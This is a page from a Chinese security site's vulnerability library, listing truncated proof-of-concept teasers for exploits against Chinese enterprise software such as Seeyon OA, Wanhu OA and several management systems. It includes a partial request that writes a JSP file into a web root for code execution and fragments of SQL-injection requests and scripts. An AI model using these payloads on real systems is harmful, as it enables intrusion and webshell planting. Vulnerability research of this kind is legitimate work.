最新发布第40页
致远在野constDef接囗存在代码执行漏洞_秃兔安全

致远在野constDef接囗存在代码执行漏洞

GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22P...
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
012113
用友-畅捷通CRM-任意文件上传_秃兔安全
捷诚管理信息系统 SQL注入漏洞_秃兔安全

捷诚管理信息系统 SQL注入漏洞

import timeimport requests def verify(ip):url = f'{ip}EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx’headers = { 登录可见余下内容
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
01215
福建科立讯通信 指挥调度管理平台 ajax users.php SQL 注入漏洞_秃兔安全

福建科立讯通信 指挥调度管理平台 ajax users.php SQL 注入漏洞

POST /app/ext/ajax users.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
01215
金慧-综合管理信息系统-SQL注入_秃兔安全
【通用】 勤云科技期刊采编CMS存在SQL注入漏洞_秃兔安全

【通用】 勤云科技期刊采编CMS存在SQL注入漏洞

fofa语句yakit插件uuidpocyakit && nuclei yaml已验证   
金和OA_SAP_B1Config.aspx未授权访问漏洞_秃兔安全
【通用】万户OA govdocumentmanager_sendfile_gd sqli_秃兔安全

【通用】万户OA govdocumentmanager_sendfile_gd sqli

fofa语句yakit插件 uuidpocyaml懒得验证  
dreamer292的头像_秃兔安全至尊玉兔dreamer29211个月前
01205
九思-OA-任意文件上传_秃兔安全
【通用】IP网络对讲广播系统 videobacktrackpush 文件上传漏洞_秃兔安全

【通用】IP网络对讲广播系统 videobacktrackpush 文件上传漏洞

fofa语句yakit插件 uuidpocyaml   已验证 
dreamer292的头像_秃兔安全至尊玉兔dreamer2921年前
012015
攻防演练 & 红蓝对抗 & 其他文库
红队文库
涵盖常规系统命令、常见工具命令、内网渗透命令、渗透测试常用命令、远程控制常用命令等;达五十万字
10篇文章更多文章
高级资源版块:签到即免费领积分